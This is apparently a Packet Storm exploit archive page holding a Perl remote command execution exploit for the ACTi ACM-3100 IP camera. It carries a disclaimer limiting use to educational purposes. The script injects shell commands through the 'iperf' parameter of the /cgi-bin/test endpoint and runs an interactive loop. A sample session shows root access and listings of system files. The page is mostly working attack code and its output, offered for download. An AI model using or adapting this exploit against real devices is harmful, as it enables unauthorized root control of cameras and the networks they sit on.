exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

ACTi ACM-3100 Camera Remote Command Execution

ACTi ACM-3100 Camera Remote Command Execution
Posted Sep 25, 2019
Authored by Todor Donev

ACTi ACM-3100 Camera remote command execution exploit.

tags | exploit, remote
SHA-256 | 7f1e9ea1a491c60e423b6fa50cb927189ea09b4233fc7981a0cbffb3c87e6edd

ACTi ACM-3100 Camera Remote Command Execution

Change Mirror Download
#!/usr/bin/perl
#
# ACTi ACM-3100 Camera Remote Command Execution Exploit
#
# Copyright 2019 (c) Todor Donev <todor.donev at gmail.com>
#
#
# Disclaimer:
# This or previous programs are for Educational purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the fact that Todor Donev is not liable for any damages
# caused by direct or indirect use of the information or functionality provided by these programs.
# The author or any Internet provider bears NO responsibility for content or misuse of these programs
# or any derivatives thereof. By using these programs you accept the fact that any damage (dataloss,
# system crash, system compromise, etc.) caused by the use of these programs are not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
# (Dont do anything without permissions)
#
# # [test@localhost acti]$ perl actiroot.pl 192.168.1.1
# # [ ACTi ACM-3100 Camera Remote Command Execution Exploit
# # [ =========================================================
# # [ Exploit author: Todor Donev 2019 <todor.donev@gmail.com>
# # # id
# # execute : /sbin/iperf -c ;id &
# # uid=0(root) gid=0(root)
# # # ls -la
# # execute : /sbin/iperf -c ;ls -la &
# # -rwxr-xr-x 1 0 0 14900 test
# # -rwxr-xr-x 1 0 0 32028 80503736
# # -rwxr-xr-x 1 0 0 8872 macdev
# # -rwxr-xr-x 1 0 0 29804 updatem
# # -rwxr-xr-x 1 0 0 31788 update
# # -rwxr-xr-x 1 0 0 28676 mpeg4
# # -rwxr-xr-x 1 0 0 137040 videoconfiguration.cgi
# # lrwxrwxrwx 1 0 0 6 url.cgi -> system
# # -rwxr-xr-x 1 0 0 27780 system
# # drwxr-xr-x 2 0 0 1024 cmd
# # drwxr-xr-x 5 0 0 1024 ..
# # drw-r--r-- 3 0 0 1024 .
# # # ls -la /etc/
# # execute : /sbin/iperf -c ;ls -la /etc/ &
# # -rw-r--r-- 1 0 0 71 hosts
# # drwxr-xr-x 3 0 0 1024 default
# # drwxr-xr-x 2 0 0 1024 config
# # -rwxr-xr-x 1 0 0 5834 protocols
# # drwxr-xr-x 4 0 0 1024 ppp
# # drwxr-xr-x 2 0 0 1024 dhcpc
# # -rwxr-xr-x 1 0 0 211 inittab
# # -rwxr-xr-x 1 0 0 26 host.conf
# # -rwxr-xr-x 1 0 0 534 passwd
# # -rwxr-xr-x 1 0 0 280 group
# # drwxr-xr-x 2 0 0 1024 init.d
# # -rwxr-xr-x 1 0 0 421 profile
# # -rw-r--r-- 1 0 0 25 resolv.conf
# # -rwxr-xr-x 1 0 0 10787 services
# # drwxr-xr-x 2 0 0 1024 thttpd
# # -rwxr-xr-x 1 0 0 251 fstab
# # drwxr-xr-x 13 0 0 1024 ..
# # drwxr-xr-x 8 0 0 1024 .
# # #
# #

use LWP::Simple;

print "[ ACTi ACM-3100 Camera Remote Command Execution Exploit
[ =========================================================
[ Exploit author: Todor Donev 2019 <todor.donev\@gmail.com>
";

if(not defined $ARGV[0])
{
print "[ Usage: perl $0 [target]\n";
print "[ Example: perl $0 192.168.1.1\n\n";
exit;
}
my $host = $ARGV[0] =~ /^http:\/\// ? $ARGV[0]: 'http://' . $ARGV[0];
while(1)
{
print "\# ";
chomp($cmd = <STDIN>);
if($cmd eq "clear"){system $^O eq 'MSWin32' ? 'cls' : 'clear';}
last if $cmd eq 'exit';
last if is_error(getprint($host."/cgi-bin/test?iperf=;${cmd}"));
print $resp;
}

Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close